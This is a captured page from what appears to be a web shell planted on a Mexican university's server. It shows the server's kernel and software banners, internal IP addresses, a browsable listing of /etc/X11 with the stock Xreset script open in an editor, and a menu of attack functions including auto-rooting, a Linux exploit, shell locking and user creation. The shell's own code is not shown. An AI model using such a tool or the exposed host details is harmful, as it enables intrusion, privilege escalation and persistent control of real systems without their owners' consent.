Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
etc /
X11 /
[ HOME SHELL ]
Name
Size
Permission
Action
app-defaults
[ DIR ]
drwxr-xr-x
cursors
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
xinit
[ DIR ]
drwxr-xr-x
xkb
[ DIR ]
drwxr-xr-x
xorg.conf.d
[ DIR ]
drwxr-xr-x
Xreset.d
[ DIR ]
drwxr-xr-x
Xresources
[ DIR ]
drwxr-xr-x
Xsession.d
[ DIR ]
drwxr-xr-x
xsm
[ DIR ]
drwxr-xr-x
default-display-manager
15
B
-rw-r--r--
rgb.txt
16.99
KB
-rw-r--r--
Xreset
709
B
-rwxr-xr-x
Xsession
4.04
KB
-rwxr-xr-x
Xsession.options
265
B
-rw-r--r--
XvMCConfig
13
B
-rw-r--r--
Xwrapper.config
630
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Xreset
#!/bin/sh # # /etc/X11/Xreset # # global Xreset file -- for use by display managers # $Id: Xsession 967 2005-12-27 07:20:55Z dnusinow $ set -e PROGNAME=Xreset SYSSESSIONDIR=/etc/X11/Xreset.d if [ ! -d "$SYSSESSIONDIR" ]; then # Nothing to do, exiting exit 0 fi # use run-parts to source every file in the session directory; we source # instead of executing so that the variables and functions defined above # are available to the scripts, and so that they can pass variables to each # other SESSIONFILES=$(run-parts --list $SYSSESSIONDIR) if [ -n "$SESSIONFILES" ]; then set +e for SESSIONFILE in $SESSIONFILES; do . $SESSIONFILE done set -e fi exit 0 # vim:set ai et sts=2 sw=2 tw=80:
Close